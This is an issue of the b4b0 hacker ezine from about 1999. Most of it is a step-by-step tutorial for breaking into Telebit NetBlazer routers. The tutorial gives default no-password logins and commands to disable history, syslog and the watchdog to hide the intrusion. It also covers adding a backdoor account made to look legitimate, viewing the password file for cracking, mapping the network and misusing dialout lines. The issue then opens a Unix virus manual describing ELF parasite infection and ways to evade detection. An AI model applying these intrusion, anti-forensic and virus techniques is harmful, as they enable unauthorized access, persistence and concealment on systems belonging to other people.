Copy Link
Add to Bookmark
Report

B4b0 09

eZine's profile picture
Published in 
B4b0
 · 5 years ago

  

b4b0!b4b0!b4b0!b4b0!b4b0!!b4b0-[ .b4b0-IX. ]-!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!

[ B 4 B 0 ]
&$&$&$&$&
&$&$&$&
&$&$&
&$&$&$&
&$&$&$&$&
&$&$&$&$&$&$&$&$&$&$&$&$&
&$&$&$www.b 4 b 0.org&$&$&$
&$&$&$&$&$&$&$&$&$&$&$&$&

$&$&$&$&$&$ $&$&.$&$& $&$&$&$&$&$ &$&$&$&$&$&$
&$&$ $&$& $&$& &$&$ &$&$ $&$& &$&$&$ &$&$
$&$& &$&$ $&$& $&$& $&$& &$&$ &$&$ &$ &$&$
&$&$ -$&$&$ $&$&$&$&$&$&$& &$&$ -$&$&$ &$&$ &$ &$&$
$&$& $&$& &$&$&$&$&$&$&$ $&$& $&$& &$&$ &$ &$&$
&$&$ &$&$ &$&$ &$&$ &$&$ &$&$ &$&$&$
$&$&$&$&$&$ &$&$ $&$&$&$&$&$ &$&$&$&$&$&$


b4b0-9-b4b0-9-b4b0-9-[ Episode IX - THE PH4NT0M M31NEL ]-b4b0-9-b4b0-9-b4b0-9

<sean__> frankly. im tired of tips constant sexual advances towards me.

b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!



-* B4B0 ST4FF *-

[ ge0rge ]------------b4b0------------b4b0------------> jorge
[ tEEp ]------------b4b0------------b4b0------------> tip
[ PhFh4Ck3r ]------------b4b0------------b4b0------------> jsbach
[ KuR4cK ]------------b4b0------------b4b0------------> chrak
[ gRE-0p ]------------b4b0------------b4b0------------> gr1p
[ sEEgn4l ]------------b4b0------------b4b0------------> rsh
[ thE MiLk ]------------b4b0------------b4b0------------> MiLk-MaN
[ jEEmEE ]------------b4b0------------b4b0------------> jimmy
[ tYE-mAHt ]------------b4b0------------b4b0------------> tymat
[ phEEckZ ]------------b4b0------------b4b0------------> phix
[ hIE-bRIhD ]------------b4b0------------b4b0------------> hybrid
[ aH-lEHck ]------------b4b0------------b4b0------------> alec
[ smIEleH ]------------b4b0------------b4b0------------> smiler
[ pAH-bEhL ]------------b4b0------------b4b0------------> pabell
[ sEEl-vEE-0h ]------------b4b0------------b4b0------------> silvio
[ pBX-PhREEk ]------------b4b0------------b4b0------------> PBXPhreak
[ m1st4h cl34n ]------------b4b0------------b4b0------------> mr clean


-* B4B0-9 C0NTR1BUT3RZ *-

Articles, Juarez, Ascii...

diab / silvio / tip / gr1p / Synner / m0nty / PBXphreak / Creed / opt1mus
pr1me zortinator / polder / majere / lusta / hybrid / ep1d / rsh / icesk /
Vortexia / dm / coek / MiLk-MaN / nop


-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

______________
/ \
| wh3r3 1z d4t |
| b4b0 k0de!!! |
\_____ _____/
\ /
$$$$$$$$$ \/
\(_)-(_)/ /
( O )
\ /-\ /
_\\_//_
/ \_/ \
/ \
/_/ \_\
(_) (_)
|_________|
\ /
\ | /
|_|_|
(_/ \_)

<mk33> g-: WTF is a 'kode'?

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


[!@#$#@!] Table of Contents [!@#$#@!]

[ 1]--[ Hacking the Telebit Netblazer ]---------------> diab
[ 2]--[ The Unix Virus Manual ]---------------> silvio
[ 3]--[ Return of the IRC Logs ]---------------> nop
[ 4]--[ BT ClickDial - Web Enabled CTI ]---------------> gr1p
[ 5]--[ Chaos Magick Theory ]---------------> Synner
[ 6]--[ Satellites and Sat. Communication ]---------------> Monty
[ 7]--[ Ericsson Consona MD110 PBX ]---------------> PBXPhreak
[ 8]--[ Knark - Kernel based Linux rootkit ]---------------> Creed
[ 9]--[ Dismantle the FCC ]---------------> opt1mus/zort
[10]--[ An introduction to BASIC Stamps ]---------------> polder
[11]--[ DECnet Fun ]---------------> majere
[12]--[ Introduction to gawk/awk ]---------------> lusta
[13]--[ Digital Access Carrier System DACS ]---------------> hybrid
[14]--[ Introduction to Encryption (V.1) ]---------------> ep1d
[15]--[ Can People read your mind? ]---------------> silvio

[!@#$#@!] Juarez [!@#$#@!]

[1]--[ ipop.c ]----------------------> rsh
[2]--[ irc.girls ]----------------------> lusta
[3]--[ clickdial.zip ]----------------------> gr1p
[4]--[ knark-0.41.tar.gz ]----------------------> Creed
[5]--[ fuckme.c ]----------------------> icesk
[6]--[ killsentry.c ]----------------------> Vortexia
[7]--[ fakescan.c ]----------------------> Vortexia
[8]--[ dialplus.txt ]----------------------> gr1p

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
<tip> yo
<tip> brb.
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

-Greets: hybrid, 9x, Substance, The Veiled Society BBS, w1rep4ir, x.25
haqrs, jarvis, csoft, samj, jcb, m1x, schemerz, vhd, nop, st0ner,
jsbach, m0nty, doctor_x, Synner, fuzebox, icesk, diab, ohday,
tymat, majere, dr_phace, ch4x, NoU, polder, micah, euk, knight,
ganja farmers, rude boyz, Persiadic, lusta, tewl, rtm, jennicide,
Esko, dephile, mynd, assem, The Hill Street Blues Cafe in
Amsterdam, duke, anything old-school, rach, tGb, Katie Holmes,
gob, ep1d, jayenz, wyze1, oclet, demos, active, Prince Naseem
Hammed (Ex-Telco. Engineer!), all the contributers and b4b0 staff
for keeping it real.


- Thanks: Australia (ALOC - (Australian Legion Of Crash-overrides) *not*
included).


- Links: http://ipindex.dragonstar.net (FUQN OWNZ)
http://virus.beergrave.net (Unix-Virus Mailing List)
http://freeusers.digibel.be/~c0ur1erz (x.25)

Thought: "Its Better to be coming down than to have never been high at all".

--> RIP: T34M D4C0M

Email b4b0! : letters@b4b0.org
Submit to b4b0! : submissions@b4b0.org
View b4b0! : http://www.b4b0.org

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
<datu:#darkcyde> hey can u do dcc in bitchx?
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

[!@#$#@!] INTRODUCTION [!@#$#@!]

Yeah, b4b0-9 is finally here, sorry about the delay; actually we're not
sorry. Some people have been busy, while others have just been plain lazy.
If you feel the need to blame something, blame that.

This is a pretty large issue with some varied content, so enjoy, and let's
see submissions rolling in for b4b0-10 plz.

- The Limey Bastard

B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.1.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)
(*)H A C K I N G T H E T E L E B I T N E T B L A Z E R(*)
(*) A brief tutorial by diab (*)
(*) DATE: ermm.. sometime in 99 (*)
(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)

[[==========================================================================]]
---[ I N D E X ]
[[==========================================================================]]

- What exactly is a TELEBIT netblazer?
- Identifying a TELEBIT netblazer
- Where's the default logins?!?
- Basic commands once inside netblazer
- System logging
- Finding and viewing the password/user file
- Adding an account
- Exploring the system / network
- Some neat features and tips
- Conclusion / Greets / Contacts etc...

[[==========================================================================]]
---[ What exactly is a TELEBIT netblazer? ]
[[==========================================================================]]

TELEBIT netblazers have been around for a while. Iam sure if you did a lot
of wardialing or inet scanning you would of came across one. They are fairly
popular in the LAN world. I have only come across 2 types of netblazer routers
which are:
NetBlazer Sti/40i: Used on fairly big LAN's for large companies. e.g.
industrial areas.
NetBlazer LS: Not as powerful as the Sti and 40i platforms. Used on small
office/home office environments.
Both offer seamless client-to-LAN remote network access, on-demand LAN-to-LAN
interconnection, and dial-out modem sharing. The newest version of NetBlazer
is 3.6 I think but most NetBlazers are the same only minor changes to programs
etc. In this txt I will explain the benefits of a netblazer to a hacker. The
commands it uses are kinda like unix and dos (e.g. dir and grep etc). I will
try to make this file as brief as possible as it is written in a format for a
article in a ezine. To obtain more information about netblazers visit
www.telebit.com or use search engines etc. PLEASE NOTE : the account used for
all this information below was the root account, you must have an account
which has the same privs as root to perform all of the tasks.
Anyway on with the show....

[[==========================================================================]]
---[ Identifying a TELEBIT netblazer ]
[[==========================================================================]]

Telebit's netblazer can be found on the internet and on dialup modems. Through
various tcp/ip scanning or wardialing you might come across a login banner
like the following:

Telebit's NetBlazer Version 3.1

NB login:
Password:

As you can see the netblazer proudly identifies itself. If you somehow managed
to get an account on the netblazer, either by sniffing or using the defaults
later on in this paper, you will have a command prompt like this:
NB:Top>
If you don't have a command prompt and you just slip straight into a slip or
ppp session then you could either use the account for inet access or try
another account that will give you the command prompt.

[[==========================================================================]]
---[ Where's the default logins?!? ]
[[==========================================================================]]

Yeah you guessed it... netblazer has default logins. More of the older type
of netblazers (3.1 and below) have default logins. Below are default accounts
that could (if the admin is dumb) get you in:

USERNAME PASSWORD COMMENT
=========== ========== =========================================
lan <nopasswd> : seen before
test <nopasswd> : havent seen before probably exist > 3.1
snmp <nopasswd> : seen before
default-ppp <nopasswd> : seen before
remote <nopasswd> : havent seen before probably exist > 3.1
MAV <nopasswd> : havent seen before probably exist > 3.1
setup <setup/nopasswd> : seen before

snmp and setup have the same privledges as root. Try those two first before
trying the rest as the others may not allow you to do much at all except
starting a slip or ppp session. If your lucky the other accounts might have
permission to view the password file.

[[==========================================================================]]
---[ Important commands and directories ]
[[==========================================================================]]

Iam not going to spend a great deal of time explaining commands on netblazer.
However I will explain some of the important commands in the 'Bin' directory.
To get information about the commands available at a particular menu level,
use the ? command. Example:
NB:Top> ?
Available commands:
bin> configure> disk> help
history> list> logout reboot
sessions> shutdown top> ?

Words with '>' at the end means its a directory, the others are commands.
To get all the commands available (and there is quiet a few) on the netblazer
type 'commands' in any directory.
Important commands in the 'Bin' directory are:

Command Description
========================================================================
activate : activate a ppp or slip session.
edit : ummm duh. bin edit <filename>.
tcl : Used to setup complex command scripts.
dir : Directory listing on the diskette.
type : Like 'cat' in unix and type in DOS. bin type <filename>
background : Run a command in the background. bin background <command> <args>
output : Sends output of a command into a file. bin output [-a] <filename>
source : Runs a series of commands in a file (like shell scripts).
where : Shows you where you are on the command tree.
tty : Displays line or port you are currently logged on to.
who }\
more } \_ Iam not going to explain these commands because they are
grep } / exactly like unix.
echo }/
========================================================================
You can also get the command reference manual information about a particular
command by using the "man" command, and get information about the available
commands on a topic by doing "man -k topic",
e.g. man -k add

The important directories that you should take note of are:
============================================================================
Bin : Where all the basic commands are held.
Configure : All the configuration commands and files are.
History : History logging (like .bash_history in unix)
Configure>Dialout>: Commands used while dialing out.
Configure>IP> : IP configuration for mapping out the network.
Configure>Line> : Commands that give information about certain modem lines.
Configure>Security> : All the security files/commands are here.
Configure>Syslog> : All system log files/commands are here.
Configure>User> : Commands used to add users, configure users etc.
Sessions: Commands used to start certain sessions, config etc. e.g. telnet
List>: Commands in this directory give info about network/system stats.

[[==========================================================================]]
---[ System logging ]
[[==========================================================================]]

The first thing to do is to turn off 'History'. The history directory is like
the .bash_history in unix. Simply type this:
NB:Top> history off
NB:Top> history status
history not on

Remember turn history back on as you leave if it was turned on previously.
The next thing to do is check whether the server you hacked has syslog and
syslog buffer on. Do this by typing 'syslog' then
'buffer list' :
NB:Top> syslog
NB:Top>Configure>Syslog> buffer list

If both are on you will get something like the following:

NB:Top>Configure>Syslog> buffer list
Tue Feb 23 2:49:02 1999 - root logged-in from 203.24.123.2:1590
Tue Feb 23 2:49:50 1999 - root on 203.24.123.2:1590 at Feb 23 for 48 seconds
NB:Top>Configure>Syslog>

If syslog and syslog buffer are on you need to see whether it is logging on
the current server or another server. Also you need to know the general layout
of the syslog. You can do this by typing 'list' in the Syslog directory:

NB:Top>Configure>Syslog> list
sending syslog messages to 203.191.2.100, facility = local0
syslog to console is off
syslog to buffer is on; level <= 4
syslog internal buffer size = 20K
syslog to session is on; level <= 6
syslog interval is off
(Levels: 0-emerg,1-alert,2-crit,3-err,4-warning,5-notice,6-info,7-debug)
(Counts: 0-0, 1-0, 2-0, 3-0, 4-0, 5-1, 6-9, 7-1)
Syslog requested - 11, ignored - 11, queued - 0, dropped - 0

If your Syslog messages are logged to another server then you need to hack
the server its sending it to or you can disable it sending to the remote
server by doing 'syslog host off' but that might raise the admins eyebrow.
Notice the levels of severity. You will find these in the syslog buffer.
Here is a table that explains the level of severity in descending order:

Level | Message Severity |
==========================================================================
0 | emerg - panic conditions requiring immediate attention |
1 | alert - conditions that should be corrected immediately |
2 | crit - critical error conditions |
3 | err - other error conditions |
4 | warning - warning messages |
5 | notice - non-error conditions requiring special handling |
6 | info - informational messages |
7 | debug - messages that are used only for debugging |
==========================================================================

By default netblazer has syslog off therefore syslog buffer is off. If syslog
and syslog buffer is on you need to turn syslog buffer off or filter the
syslog messages so that it nulls out your telnet connections out of the server
or root connections or whatever you really want. Here are the two ways of
doing it:

Turn syslog buffer off:
NB:Top>Configure>Syslog> buffer off

Null out all 'telnet' connections out of syslog buffer:
NB:Top>Configure>Syslog> message telnet ""

Sometimes the admin might use 'syslog interval' (you should of seen whether
it was on/off when you typed 'list'), which tells netblazer to send syslog
messages for logged-in users at specified intervals.
Theres another logging program on the system called 'watchdog' which is disabled
by default. Watchdog allows access (via Passwords) only to files and directories
that you specify. You can specify whether specfic users can read or write in
specific directories, or only read old files, or only creat new files, you can
even encrypt files and do many other neat things. To disable watchdog type
'server stop watchdog'. If it was on previsiously put it back on by typing
'server start watchdog'.

[[==========================================================================]]
--[ Viewing the password file ]
[[==========================================================================]]

To see the password file, move into directory 'List' and execute the command
'user' :

NB:Top>List> user

USERID PASSWORD CRYPTO USE PRIVS FLG DEST-GROUP
root 1sfeqss39MXsY login SCDTM-----
diab 7IaBbQyo5lEIM Dial PPP ----M-----
.....(there should be a lot more listed below)

The above password file showed a user with complete system privs (root) and
just a normal user. Now I will explain the password file layout.

USERID: The username of the user.
PASSWORD: The DES encrypted password for the user.
CRYPTO: Assigns a crypto key to the user. A crypto key should only be
assigned to dynamic interface packet mode user IDs, ARA users, or dial-in
users who have the capability to respond to a crypto challenge.
USE: Whether the user can login into a shell or goes straight into a PPP or
slip session. (When you have access to a shell you can execute a PPP or slip
session).
PRIVS: What Priveledges the user has on the server. These are:
S=status
C=config
D=dial-ok
T=telnet/rlogin-ok
A=acs-ok
B=ARA-ok
M=multi-login-ok
FLAGS:
X=clone
N=from-network
DEST-GROUP: Assigning a user to a destination group lets you restrict that
user's dialout, telnet, and/or rlogin access to only those destination that
are defined in the user's destination group.

[[==========================================================================]]
---[ Adding a account ]
[[==========================================================================]]

Okay basically you need an account that blends in with the rest of the user
list. To add a user do the following:

NB:Top> user
NB:Top>Configure>User> add <username>

In this case I will add the user 'jack'.
NB:Top>Configure>User> add jack
NB:Top>Configure>User> list jack
USERID PASSWORD CRYPTO USE PRIVS FLG DEST-GROUP
jack login --DT------

As you can see jack has no password set and has jackshit privledges so we need
to update these:
First change jacks password...
NB:Top>Configure>User> password jack
Changing password for jack
New Password:
Retype Password:

Okay, jacks password is set, we now then decide whether to upgrade his privs
or not. If you think its gonna standout too much don't upgrade the privs but if
you want more control of the system upgrade them. We now decide to upgrade.
Format is: user privilege <userid> <[-]conf> <[-]stat>

NB:Top>Configure>User> user privilege jack conf stat
NB:Top>Configure>User> list jack
USERID PASSWORD CRYPTO USE PRIVS FLG DEST-GROUP
jack 7IaBbQyo5lEIM login SCDT------

So now jack has a password, decent priveledges and blends in with the rest of
the user file. From this step we now explore the system / network.

[[==========================================================================]]
---[ Exploring the system / network ]
[[==========================================================================]]

If the netblazer is on a dialup modem check whether the box is connected to
the net. Move into the configuration ip directory and type 'address':

NB:Top> ip
NB:Top>Configure>IP> address
Global IP address is 132.0.4.3

This gives you the global ip address for the box. Next time your on the net
resolve the ip and check if the ip has a webpage etc. If it is connected to
the net like the above look to see what ports are open on the box by typing
'tcp list':

NB:Top>Configure>IP> tcp list
(You will have a load of tcp statistics here but what your after is below it)
# &TCB Rcv-Q Snd-Q Local socket Remote socket State
02 1a3cd0 0 0 0.0.0.0:21 0.0.0.0:0 Listen (S)
03 1a48c4 0 0 0.0.0.0:79 0.0.0.0:0 Listen (S)
04 1a0e20 0 0 0.0.0.0:23 0.0.0.0:0 Listen (S)

As we can see port 21 (ftp), 79 (finger) and 23 (telnet) are open.
Other ways of gathering more network information is going into the 'List'
diectory and displaying some config files. e.g. 'list servers' etc.
Example:
NB:Top>List> servers
Server Status
bootp off
discard off
echo off
finger on
ftp on
gdb off
raw off
rip on
snmp on
ipxsnmp off
status off
telnet on
watchdog off
macip off
telnet on 203.146.7.223
telnet on 80 httpd

AppleTalk servers:
adsp on

To see what processors are running on the box type 'list ps':
NB:Top>List> ps
Pgroup pid user stksize maxstk heap event flags time name
main 1 system 8K 2.2K 1097K 3c4e04 IW 47.8 main
main 2 system 8K 1.2K 153K I 3H en0
main 3 system 8K 0.9K 8K fc5b0 IW 2:51 killer
main 4 system 8K 1.3K 17K 39.0 timer
main 5 system 8K 0.1K 8K ecd0c W 0.0 tracer
main 6 system 4K 1.1K 4K ff9e8 W 1:17 syslog
main 7 system 8K 0.2K 8K a715c W 3.8 comport_proc
main 8 system 4K 0.1K 4K 101b30 IW 0.0 syslog_slow
main 10 system 4K 0.5K 4K 386bd8 IW 55:41 namru-19200 ra
.119:1439 11940 httpd 8K 0.3K 8K 3c3ef4 IW 0.0 telser_in
.236:1686 11980 httpd 8K 1.4K 14K 1c1128 IW 0.0 in_telnet
.236:1686 11981 httpd 8K 0.3K 8K 1c29a0 IW 0.0 telser_in
3.65:4794 21054 root 8K 0.4K 8K 3c3f44 IW 0.0 telser_in
main 21064 system 2K 0.7K 4K 1d9bc0 IW 0.0 line100
.156:1183 21066 httpd 8K 1.4K 14K 10357c IW 0.0 in_telnet
.156:1183 21067 httpd 8K 0.3K 8K 3c3f6c IW 0.0 telser_in
main 21068 system 2K 0.7K 4K 3323f8 IW 0.0 line112
(This is actually a shorter version of the processors there should be a lot
more.)

To see a list of boxes connected to the network type 'list arp':
NB:Top> list arp
received 146788 badtype 0 badlen 0 bogus addr 0
request in 144200 replies 910 request out 938 for us 0
IP addr Type Interface Time Q Addr
203.146.12.11 ether any 871 00:a0:c9:da:e7:6b
203.146.12.10 ether any 794 00:00:0c:06:0d:e1
203.146.12.21 ether any 554 00:a0:24:14:f6:55
203.146.12.20 ether any 725 00:10:5a:9c:98:30
203.146.12.4 ether any 705 00:00:c0:de:1b:b3
203.146.12.113 ether any 877 00:20:af:75:3d:e4
203.146.12.1 ether any 450 00:00:0c:19:b4:e2
203.146.12.0 ether any 0 ff:ff:ff:ff:ff:ff

To see the modem line statistics type 'line statistics':
NB:Top>Configure>Line> statistics
Line Speed Bytes in Bytes out Overruns Dropped Queued Doing
line00 9600 0 64 0 0 0 Idle
line01 9600 0 64 0 0 0 Idle
line02 9600 0 64 0 0 0 Idle
line100 115200 59028233 441419764 0 0 0 Idle
line101 115200 57090452 348643058 0 0 0 Idle
line102 19200 45969368 30098161 0 0 0 PPP
line103 115200 48166164 273295927 0 0 0 PPP
line104 115200 54454271 435126641 0 0 0 Idle
line105 9600 0 64 0 0 0 Idle
line106 115200 45593641 302021248 0 0 0 Idle
line107 115200 47639900 313846050 0 0 0 Idle
line110 115200 59897334 366434651 0 0 0 Idle
line111 115200 86619249 403328465 0 0 0 Idle
line112 115200 44791599 331359218 0 0 0 Idle
line113 115200 41869 20337 0 0 0 Idle

The 'list' directory and the commands in it will give you all the info you
need about mapping the network out.
A feature netblazer has is the option of dialing out of the system. I will
explain how to use this later but for now we need to gather up information
about what computers that users on the netblazer have been dialing to. We do
this by typing 'dialout list':

NB:Top>dialout list
Name Phone Characteristics
gtbupdate 1-409-755-3766 dialout
tnb41 9321 internaldial
98210 9321 internaldial
nb220 9321 internaldial
hunting1 24029973 dialout2
bog0r1 02598878592 pepdialout
bog0r2 02593164706 dialout
slipdrn31 71678231 info-only
lapan_sl 68938334 info-only
nbp98s 313449057 pepdialout
bpsrouter 351349747 info-only

The file is divided up into 3 sections.
1) Name: is the username that is assigned to the dialout.
2) Phone: is the phone number of the dialout.
3) Characteristics: The netblazer comes with ten standard dialout
characteristic groups: dialout, v32dialout, pepdialout, request, raw,
raw_dial, v25dialout, bridialout, isdndialout, and mpool. The dialout or
v32dialout groups should be used for most destinations.

By viewing the dialout list we now have other boxes to try to hack and there
is a good chance the username for the dialout will have the same username/
password as the netblazer you are on now.
Theres many other things you can do next. If you are root or privledges equal
to root then go through all directories and view configuration files etc
(type <filename>). Also do a scan of the companies subnet to see if you have
access to any of the boxes that are connected to the companies network.

[[==========================================================================]]
---[ Some neat features and tips]
[[==========================================================================]]

Like many other boxes connected to the net you can telnet out, use ftp, etc.
This is good for diverting over the internet. The syntax for it is almost
exactly the same as unix:
Telneting out:
NB:Top>sessions telnet <host>
FTPing somewhere:
NB:Top>sessions tftp <host>

Now I will move to the outdialing feature. Okay, first of all you have to know
what country the netblazer is located in so that you can use the correct
country codes for dialing. Once you found out the country code format you can
add a dialout number to the dialout file. Do this by typing 'dialout add'.
You will be then prompted for the name of the dialout, phonenumber etc. Only
add the dialout before you use it, don't leave it on the system so delete it
straight after finishing it. Example for adding a dialout follow's:

NB:Top>Configure>Dialout> add
Name of dialout: branch
Phone number: 555-1234
Line characteristics [dialout]: (just press enter; default = dialout)
Char mode timeout (in minutes) [60]:
Dialout: name=branch, phone=555-1234, characteristics=dialout
Okay (yes|no|quit) [y]?

okay now lets check if everthing is added in correctly:

NB:Top>dialout list
Name Phone Characteristics
tbupdate 1-408-745-3700 dialout
nb41 9821 internaldial
9821 9821 internaldial
nb21 9821 internaldial
hunting 2302373 dialout2
bogor1 0251328592 pepdialout
bogor2 0251314706 dialout
slipdrn31 3169811 info-only
branch 555-1234 dialout

Yep, everything looks okay... now to test it. We use the command 'session
dial <name>'.

NB:Top>session dial branch

There is another way of dialing out IF the number dial security is enabled.
By default it is not so thats why I showed you the above method but if it is
enable all you have to do is: dialout <phone-number> [<characteristic-group>].
No need to make your own entry. After using the dialout I would advise you to
remove it by doing 'dialout delete <dialout_name>'.

TIPS FOR NETBLAZER
==================
- Always divert when hacking any dialup carrier.
- Dont over abuse the dialout option on the netblazer.
- Dont over abuse the netblazer for internet connection.
- If the netblazer is on the net, telnet into the netblazer rather then dialing
into it as you can divert more easly over the internet.
- Do regular check ups to see if the company has added any new dialout numbers
or users etc.
- Just use your head.

[[==========================================================================]]
---[ Conclusion, Contacts and Greets ]
[[==========================================================================]]

Well the TELEBIT Netblazer is a interesting system, like I said before its a
mixture if DOS and unix commands. It offers some nice features to play around
with once you have access. Getting access in the first place is obviously the
hardest part but if you have a account on the system and can login through
telnet (doesnt execute a PPP or slip session as soon as you login) you can
have a go at cracking the passwd file if you have permission to view it. Thats
about all I have to say about TELEBIT netblazer, I hope this txt gave you some
idea's, information and what not about the system. I can be contacted at the
following places:

E-mail: baid@hobbiton.org
Other: diab@irc, various BBS's ;).

Greetings to:
ozymands, buo, contagis, #hpaus, #x25, limelight BBS, *.au, gr1p, vhd, jorge,
#tmp.out (duke, rclocal, rfp, sblip etc).

- EOF


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.2.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0

UNIX VIRUSES

- Silvio Cesare <silvio@big.net.au>
- http://www.big.net.au/~silvio

CONTENTS
--------

IMPROVING THIS MANUAL
THE UNIX-VIRUS MAILING LIST
INTRODUCTION
THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION)
MEMORY LAYOUT OF AN ELF EXECUTABLE
ELF INFECTION
THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION)
INFECTING INFECTIONS
THE DATA SEGMENT VIRUS (DATA INFECTION)
VIRUS DETECTION
THE TEXT SEGMENT VIRUS (TEXT INFECTION)
INFECTION USING OBJECT CODE PARASITES
OBJECT CODE LINKING
THE IMPLEMENTED INFECTOR
NON (NOT AS) TRIVIAL PARASITE CODE
BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX
THE LINUX PARASITE VIRUS
DEVELOPMENT OF THE LINUX VIRUS
IMPROVING THE LINUX VIRUS
VIRUS DETECTION
EVADING VIRUS DETECTION IN ELF INFECTION
CONCLUSION
SOURCE (UUENCODED)

IMPROVING THIS MANUAL

For any comments or suggestions (even just to say hi) please contact the author
Silvio Cesare, <silvio@big.net.au>. This paper already has future plans to
include more parasite techniques and shared object infection. More to come.

THE UNIX-VIRUS MAILING LIST

This is the charter for the unix-virus mailing list. Unix-virus was created to
discuss viruses in the unix environment from the point of view of the virus
creator, and the security developer writing anti-virus software. Anything
related to viruses in the unix environment is open for discussion. Low level
programming is commonly seen on the list, including source code. The emphasis
is on expanding the knowledge of virus technology and not on the distribution
of viruses, so binaries are discouraged but not totally excluded. The list is
archived at http://virus.beergrave.net and it is recommended that the new
subscriber read the existing material before posting.

To subscribe to the list send a message to majordomo@virus.beergrave.net with
'subscribe unix-virus' in the body of the message.

INTRODUCTION

This paper documents the algorithms and implementation of UNIX parasite and
virus code using ELF objects. Brief introductions on UNIX virus detection and
evading such detection are given. An implementation of various ELF parasite
infectors for UNIX is provided, and an ELF virus for Linux on x86 architecture
is also supplied.

Elementary programming and UNIX knowledge is assumed, and an understanding of
Linux x86 architecture is assumed for the Linux implementation. ELF
understanding is not required but will help.

This paper does not document any significant virus programming techniques
except those that are only applicable to the UNIX environment. Nor does it
try to replicate the ELF specifications. The interested reader is advised
to read the ELF documentation if this paper is unclear in ELF specifics.

THE NON ELF INFECTOR FILE VIRUS (FILE INFECTION)

An interesting, yet simple idea for a virus takes note, that when you append
one executable to another, the original executable executes, but the latter
executable is still intact and retrievable and even executable if copied to
a new file and executed.

# cat host >> parasite
# mv parasite host
# ./host
PARASITE Executed

Now.. if the parasite keeps track of its own length, it can copy the original
host to a new file, then execute it like normal, making a working parasite and
virus. The algorithm is as follows:

* execute parasite work code
* lseek to the end of the parasite
* read the remaining portion of the file
* write to a new file
* execute the new file

The downfall with this approach is that the remaining executable no longer
remains strip safe. This will be explained further on when a greater
understanding of the ELF format is obtained, but to summarize, the ELF headers
no longer hold into account every portion of the file, and strip removes
unaccounted portions. This is the premise of virus detection with this type of
virus.

This same method can be used to infect LKM's following similar procedures.

MEMORY LAYOUT OF AN ELF EXECUTABLE

A process image consists of a 'text segment' and a 'data segment'. The text
segment is given the memory protection r-x (from this its obvious that self
modifying code cannot be used in the text segment). The data segment is
given the protection rw-.

The segment as seen from the process image is typically not all in use as
memory used by the process rarely lies on a page border (or we can say, not
congruent to modulo the page size). Padding completes the segment, and in
practice looks like this.

key:
[...] A complete page
M Memory used in this segment
P Padding

Page Nr
#1 [PPPPMMMMMMMMMMMM] \
#2 [MMMMMMMMMMMMMMMM] |- A segment
#3 [MMMMMMMMMMMMPPPP] /

Segments are not bound to use multiple pages, so a single page segment is
quite possible.

Page Nr
#1 [PPPPMMMMMMMMPPPP] <- A segment

Typically, the data segment directly proceeds the text segment which always
starts on a page, but the data segment may not. The memory layout for a
process image is thus.

key:
[...] A complete page
T Text
D Data
P Padding

Page Nr
#1 [TTTTTTTTTTTTTTTT] <- Part of the text segment
#2 [TTTTTTTTTTTTTTTT] <- Part of the text segment
#3 [TTTTTTTTTTTTPPPP] <- Part of the text segment
#4 [PPPPDDDDDDDDDDDD] <- Part of the data segment
#5 [DDDDDDDDDDDDDDDD] <- Part of the data segment
#6 [DDDDDDDDDDDDPPPP] <- Part of the data segment

pages 1, 2, 3 constitute the text segment
pages 4, 5, 6 constitute the data segment

>From here on, the segment diagrams may use single pages for simplicity. eg

Page Nr
#1 [TTTTTTTTTTTTPPPP] <- The text segment
#2 [PPPPDDDDDDDDPPPP] <- The data segment

For completeness, on x86, the stack segment is located after the data segment
giving the data segment enough room for growth. Thus the stack is located at
the top of memory (remembering that it grows down).

In an ELF file, loadable segments are present physically in the file, which
completely describe the text and data segments for process image loading. A
simplified ELF format for an executable object relevant in this instance is.

ELF Header
.
.
Segment 1 <- Text
Segment 2 <- Data
.
.

Each segment has a virtual address associated with its starting location.
Absolute code that references within each segment is permissible and very
probable.

ELF INFECTION

To insert parasite code means that the process image must load it so that the
original code and data is still intact. This means, that inserting a
parasite requires the memory used in the segments to be increased.

The text segment compromises not only code, but also the ELF headers including
such things as dynamic linking information. It may be possible to keep the
text segment as is, and create another segment consisting of the parasite code,
however introducing an extra segment is certainly questionable and easy to
detect.

Page padding at segment borders however provides a practical location for
parasite code given that its size is able. This space will not interfere with
the original segments, requiring no relocation. Following the guideline just
given of preferencing the text segment, we can see that the padding at the
end of the text segment is a viable solution.

Extending the text segment backwards is a viable solution and is documented
and implemented further in this article.

